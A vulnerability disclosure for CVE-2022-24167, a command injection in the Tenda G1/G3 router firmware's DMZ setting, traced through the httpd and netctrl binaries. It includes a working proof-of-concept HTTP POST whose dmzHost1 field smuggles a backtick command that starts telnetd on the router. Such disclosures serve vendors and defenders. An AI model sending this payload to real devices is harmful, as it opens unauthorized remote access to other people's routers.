CVE-2022-24167: my_vuln/39.md at main · pjqwudi/my_vuln

Tenda Vulnerability

Vendor:Tenda

Product:G1、G3

Version:V15.11.0.17(9502)_CN(Download Link:https://www.tenda.com.cn/download/detail-3108.html)

Type:Remote Command Execution

Author:Jiaqian Peng

Institution:[email protected]

Vulnerability description

We found an Command Injection vulnerability in Tenda router with firmware which was released recently, allows remote attackers to execute arbitrary OS commands from a crafted request.

Remote Command Execution

In httpd binary:

In formSetDMZ function, dmzHost1 is directly passed by the attacker, so we can control the dmzHost1 to attack the OS.

As you can see here, the input has not been checked. And then, call the function prod_cfm_set_val to store this input.

In netctrl binary:

In advance_get_dmz_cfg function, the initial input will be extracted.

Eventually, in advance_set_dmz_cfg function, the initial input will cause command injection.

Supplement

In order to avoid such problems, we believe that the string content should be checked in the input extraction part.

PoC

We set dmzHost1 as telnetd , and the router will excute it,such as:

POST /goform/setDMZ HTTP/1.1 Host: 192.168.1.252 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/plain, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 59 Origin: http://192.168.1.252 Connection: close Referer: http://192.168.1.252/virtualServer/dmzConfig.html?0.863601486768105 Cookie: _:USERNAME:_=; G3v3_user=

dmzEn1=true&vpnFliter1=true&dmzHost1=`telnetd`&dmzEn2=false

Result

The target router has enabled the telnet service.